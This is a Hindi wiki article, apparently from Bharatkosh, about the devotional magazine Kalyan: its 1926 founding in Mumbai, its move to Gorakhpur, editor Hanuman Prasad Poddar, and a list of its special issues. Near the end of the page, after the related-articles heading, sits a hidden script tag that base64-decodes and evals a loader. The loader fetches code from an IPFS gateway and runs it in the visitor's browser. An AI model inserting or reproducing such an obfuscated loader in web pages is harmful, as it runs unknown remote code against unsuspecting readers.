कल्याण पत्रिका

भारत डिस्कवरी प्रस्तुति
Revision as of 09:19, 28 June 2018 by रविन्द्र प्रसाद (talk | contribs) (''''कल्याण पत्रिका''' का प्रकाशन अगस्त, 1926 से मुंबई...' के साथ नया पृष्ठ बनाया)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

कल्याण पत्रिका का प्रकाशन अगस्त, 1926 से मुंबई में शुरू हुआ था। एक वर्ष के बाद यह पत्रिका गोरखपुर से निकलने लगी। इसके संपादक श्री हनुमान प्रसाद पोद्दार थे।

  • हिंदी पत्रों में कल्याण की ग्राहक संख्या सबसे अधिक है। इसके प्रमुख लेखक हैं- सुदर्शन सिंह चक्र, जयदयाल गोयंदका, साधु-संत तथा संस्कृत के मर्मज्ञ। इसके अतिरिक्त कभी-कभी विदेशियों के लेखों के अनुवाद भी प्रकाशित होते हैं। यह विद्वान निश्चय ही भारतीय धर्म के पोषक होते हैं।[1]
  • इस पत्रिका के विषय भजन, योग, धर्म तथा अध्यात्म है। इसके प्रतिवर्ष निकलने वाले विशेषांक महत्व रखते हैं।
  • इसके अब तक के प्रकाशित विशेषांकों में से कुछ विशेषांकों के नाम निम्नलिखित हैं-
  1. भगवन्नामांक
  2. भक्तांक
  3. गीतांक
  4. रामायणांक
  5. कृष्णांक
  6. ईश्वरांक
  7. शिवांक
  8. शक्ति अंक
  9. योगांक
  10. संतांक
  11. मानसांक
  12. गीता तत्वांक
  13. साधनांक
  14. श्रीभगवतांक
  15. गौ अंक
  16. नारी अंक
  17. उपनिषदांक


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. हिन्दी साहित्य कोश, भाग 2 |प्रकाशक: ज्ञानमण्डल लिमिटेड, वाराणसी |संकलन: भारतकोश पुस्तकालय |संपादन: डॉ. धीरेंद्र वर्मा |पृष्ठ संख्या: 74 |

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः